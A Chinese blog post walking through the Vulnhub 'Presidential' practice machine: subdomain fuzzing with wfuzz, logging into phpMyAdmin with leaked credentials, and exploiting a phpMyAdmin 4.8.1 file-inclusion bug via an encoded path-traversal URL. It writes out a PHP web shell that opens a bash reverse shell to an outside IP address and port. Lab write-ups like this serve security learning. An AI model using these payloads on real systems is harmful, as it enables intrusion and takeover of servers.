Presidential靶机

最新推荐文章于 2024-09-07 17:21:42 发布
最新推荐文章于 2024-09-07 17:21:42 发布
阅读量385 收藏 10
点赞数 3
文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78721909/article/details/140776400
版权

一、通过扫描同段IP,得到靶机IP地址

开发的端口信息

 通过扫描目录,拼接目录没有发现信息

 

 但是找到了数据库敏感信息

二、通过观察页面,发现有个域名绑定的点

进行hosts绑定

进行域名访问

 

进行子域名爆破

试了好多种都不行,根据提示下载了个地址

wfuzz -H 'HOST:FUZZ.votenow.local' -u 'http://192.168.40.143' -w /home/kali/Desktop/SecLists-2024.2/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 854,45 

 

成功爆出来一个子域名

三、进行hosts绑定子域名,访问

 

是个数据库登录页面,通过之前发现的数据库信息,登录

 

成功登录

通过查看页面,发现有个users表

 

解密密码,解不出来

查看数据库版本

 利用漏洞工具直接搜索相关漏洞

 kali: searchaploit phpmyadmin

找到相对应的版本

查看该文件路径,并且查看

locate 44928.txt

phpadmin执行sql语句

select '<?php phpinfo();exit;?>'

然后要找到执行命令的session值

 浏览器访问

http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_ls7k5tk0ham4ls298ad3sega9cjgesup

成功解析

将执行语句换成一句话木马

select '<?php system("bash -i >& /dev/tcp/47.99.195.123/5555 0>&1");exit;?>'

 浏览器重新访问

芜丶湖
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
presidential-elections
04-01
TAMIDS 2021比赛
Presidential Challenge-开源
07-04
"总统挑战体能评分程序"是一个开源项目,旨在帮助用户输入和处理与总统挑战相关的体能测试数据。这个程序的设计和开发遵循了开源软件的原则,意味着源代码是公开的,任何人都可以查看、学习、修改,并根据需要分发。...
Presidential靶机总结
qq_45301512的博客
01-29 826
靶机下载地址:打开靶机,使用nmap扫描出靶机的ip和所有开放的端口可以看到靶机开放了80端口和2082端口使用-sV参数查看详细服务80端口是http服务2082端口是ssh服务那么我们先根据80端口打开网站网站上没有发现可以利用的漏洞点,源代码也没有提示的信息那么我们进行信息收集,目录爆破一波并没有发现有用的信息我看网上目录爆破出一个config.php.bak文件,我这里可能是字典不行这是一个数据库的配置的备份文件。
Presidential靶机打靶过程及思路
qq_52610024的博客
06-22 406
4.在user表中得到账号密码,查看/README版本信息,为4.8.1,使用searcchsploit搜索4.8.1,5.使用刚才搜索到的文件包含漏洞,执行语句后,将获得的session值填入,发现phpinfo执行。访问到config.php.bak的页面源码的数据库账号与密码,ssh爆破失败。2.发现web页面存在子域名,绑定域名,用dirsearch进行子域名爆破,发现存在与一个rce,使用该脚本攻击目标域名,但是发现无法正常使用。打开查看到root账号的密码为密文,对该密码进行爆破失败。...
vlunhub系列之presidential靶机
hanjinming110的博客
03-11 247
vlunhub系列之presidential靶机
vulnhub靶机:presidential1
weixin_52450702的博客
12-12 848
vulnhub靶机:presidential1
Vulnhub靶机实战-PRESIDENTIAL
黑白的博客
01-10 1246
声明 好好学习,天天向上 搭建 vulnhub官网下载完镜像后,用vmware打开,遇到错误点击重试,即可,选择NAT后,直接就DHCP了 注意一点,vmware的兼容性,有问题,我用vmware,反弹shell和提权的时候,惨遭失败,一定要用oracle virtualbox,一定一定一定 vmware我用的桥接,virtualbox用的仅主机网卡#2,调了一下本机的网卡,调了半天,两边才能互相ping通 信我一句话,这非技术问题困了我好几天,弄不出来,vulnhub首页说建议用virtualbox,又说
Vulnhub靶机:PRESIDENTIAL_ 1
LainWith的博客
09-07 701
系列(此系列共1台)发布日期:2020年06月28日:只用爆破拿下靶机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集子域名爆破phpmyadmin密码爆破本地文件包含本地权限漏洞SSH公钥认证。
vulnhub靶机Presidential
m0_73248913的博客
11-20 121
vulnhub靶机
【vulnhub】presidential1
开心星人的博客
07-06 916
因为靶机是host-only模式 我们将kali也设置为host-only模式 主机号太大或太小的丢掉,因为可能是网关之类的 所以靶机ip为192.168.110.128 看到有人名相关信息,之后可能需要用cwel assets目录,先看下 网站源码,看看有没有扫描敏感文件,感觉没有发现什么敏感文件cgi-bin目录403 访问一下config.php,确实有这个文件,但是为空 然后尝试会不会是备份文件config.phps 、config.php.bak 访问icons/README突然对di
Vulnhub靶机实战-Warzone 2
黑白的博客
01-10 413
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络配置和我的PRESIDENTIAL文章一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.10 -p 1-65535 -oN nmap.A 开启端口 21,22,1337 以匿名用户登录ftp 三张图片分别是用户名密码和token,旗语吗?只在亮剑里面看过旗语 对照解密后: u
US-Presidential-Speech-Analysis
03-14
【标题】"US-Presidential-Speech-Analysis" 指的是一项针对美国总统演讲的数据分析项目。这样的项目通常涉及文本挖掘、自然语言处理(NLP)以及统计分析,旨在揭示不同总统在演讲中的语言风格、主题偏好以及演说对...
FiveThirtyEight Presidential Commencement Speeches-数据集
03-09
"FiveThirtyEight Presidential Commencement Speeches" 数据集,正如其名,是一个包含美国总统在毕业典礼上演讲的集合。这个数据集由知名的统计分析网站FiveThirtyEight发布,提供了764篇毕业演讲的详细信息,旨在...
us-presidential-2020-how-close
03-04
【标题】"us-presidential-2020-how-close" 指的是2020年美国总统选举的选情分析,可能包含对选举结果、各州投票情况、候选人支持率等关键数据的深入探究。 【描述】"2020年美国总统大选有多近?在查看分析" 提示...
CPU服务器如何应对大规模并行计算需求?
JttiSEO的博客
09-04 441
通过合理的负载均衡、任务调度与优化策略,企业和科研机构能够充分挖掘计算资源的潜力,满足不断增长的计算需求。在并行计算中,缓存的性能直接影响计算效率。实时监控 CPU 服务器的性能指标,如 CPU 利用率、内存占用、I/O 等,依据监测结果进行调优,确保系统在最佳状态下运行。通过虚拟化技术,CPU 服务器能够在同一物理服务器上运行多个虚拟机,实现资源共享和有效隔离,从而优化整体计算资源的使用率。针对动态变化的计算需求,可以实现动态负载均衡机制,根据当前计算节点的负载情况,实时调整任务分配,优化资源利用。
USB驱动程序知识介绍
最新发布
HJQD777的博客
09-07 490
USB驱动程序是操作系统与USB设备之间通信的核心组件,负责设备识别、数据传输、电源管理等关键任务。它使得操作系统能够与广泛的USB设备(如键盘、鼠标、存储设备等)高效、可靠地进行交互。
springboot服务器文件读取工具类
dashalen的博客
09-06 568
springboot服务器本地文件读取和网络文件读取
ssh之登录服务器后,自动进入目录(四十七)
Android系统攻城狮
09-05 1057
本篇目的:ssh之登录服务器自动进入目录SSH(Secure Shell)是一种网络协议,用于计算机之间的加密登录和其他安全网络服务。它在1995年由芬兰学者Tatu Ylönen发明,旨在解决网络通信中的安全问题,如数据窃听、密码泄露等。以下是关于SSH的详细介绍。一、SSH的工作原理SSH通过在网络中建立加密通道,实现数据传输的机密性和完整性。其主要工作原理如下:客户端发起连接:客户端向服务器发起SSH连接请求。服务器认证:服务器向客户端发送公钥,客户端使用该公钥对服务器进行认证。
先使presidential <- subset(presidential, start > economics$date[1])
06-12
好的,您可以使用以下代码将`presidential`数据集中的日期限制为大于`economics`数据集中的第一个日期: ```r presidential (presidential, start > economics$date[1]) ``` 这将删除`presidential`数据集中任何...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值